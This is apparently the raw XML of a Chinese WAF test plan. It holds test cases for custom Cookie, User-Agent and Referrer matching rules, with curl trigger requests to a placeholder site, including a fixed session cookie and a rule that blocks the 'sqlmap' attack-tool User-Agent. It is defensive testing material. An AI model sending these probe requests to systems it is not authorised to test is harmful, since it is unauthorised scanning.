              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加匹配Cookie规则来检测流量是否匹配并进行日志记录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="12C26B93">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="74BC30EF">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="72AE3782">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20946BA4">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78F23E54">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:left="357" w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在「网站防护」-「自定义规则」-「全局自定义规则」中点击「添加规则」，当用户浏览防护站点的Cookie字段中包含</w:t>
            </w:r>
            <w:r>
              <w:t>fs2tk6o6m4sre1gopbh1qasnl5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>时进行拦截；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="004E0EDC">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:wordWrap w:val="0"/>
              <w:spacing w:after="163"/>
              <w:ind w:left="357" w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>浏览器访问：h</w:t>
            </w:r>
            <w:r>
              <w:t>ttp://www.site.com/adminLogin.php</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或curl</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>http</w:t>
            </w:r>
            <w:r>
              <w:t>://www.site.com/apache2/conf.d -H “Cookie: PHPSESSID= s2tk6o6m4sre1gopbh1qasnl5”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D9CC871">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5.   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>查看W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否对攻击进行拦截并记录匹配该条自定义规则的流量日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="22BCBCAB">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="47A5A411">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="38940CD3">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>成功匹配自定义规则，拦截流量并记录日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7CEE3194">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3D9EA092">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0982E094">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BCB9428">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="58F0F439">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2ED6197B">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="669C574D">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16CE1A17">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BFFBE63">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D37BF8C">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="145" w:name="_Toc81916126"/>
      <w:bookmarkStart w:id="146" w:name="_Toc21077822"/>
      <w:bookmarkStart w:id="147" w:name="_Toc815766480"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Agent匹配</w:t>
      </w:r>
      <w:bookmarkEnd w:id="145"/>
      <w:bookmarkEnd w:id="146"/>
      <w:bookmarkEnd w:id="14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6BD772FB">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4EBC20B2">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="223F2768">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>自定义User</w:t>
            </w:r>
            <w:r>
              <w:t>-Agent</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>匹配规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="768D9D4F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4362FBD9">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="476486A1">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加匹配User</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Agent规则来检测流量是否匹配并进行日志记录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="16E6DF82">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="31D8E333">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="6890ECF9">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ADFF74F">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D1F45ED">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在「网站防护」-「自定义规则」-「全局自定义规则」中点击「添加规则」，当用户浏览防护站点</w:t>
            </w:r>
            <w:r>
              <w:t>User Agent</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>字段中包含</w:t>
            </w:r>
            <w:r>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>时进行拦截；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53CA5FBA">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>curl -vv http://www.site.com/UA-Content.php -H “User-Agent: sqlmap”;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15C7391E">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5.   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>查看W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否对攻击进行拦截并记录匹配该条自定义规则的流量日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0745DB30">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="32194D21">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="0FB0A8BC">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>成功匹配自定义规则，拦截流量并记录日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3DBAD067">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1DF67E55">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="145937B5">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D6FC9EA">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="42D9DB5B">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3AC10707">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A3770A3">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5BE8CF91">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14A1E07D">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="212DE405">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="148" w:name="_Toc21077823"/>
      <w:bookmarkStart w:id="149" w:name="_Toc81916127"/>
      <w:bookmarkStart w:id="150" w:name="_Toc1051626912"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Refer</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>er匹配</w:t>
      </w:r>
      <w:bookmarkEnd w:id="148"/>
      <w:bookmarkEnd w:id="149"/>
      <w:bookmarkEnd w:id="150"/>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0DCF74B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="789147AA">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="78773945">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>自定义Referrer匹配规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="07C21211">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0807A907">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="28EC2E89">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加匹配Referrer规则来检测流量是否匹配并进行日志记录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="380E4154">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3B3BD6EA">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="01B0A674">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="35"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:bookmarkStart w:id="151" w:name="OLE_LINK32"/>
            <w:bookmarkStart w:id="152" w:name="OLE_LINK31"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70EE62A4">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="35"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
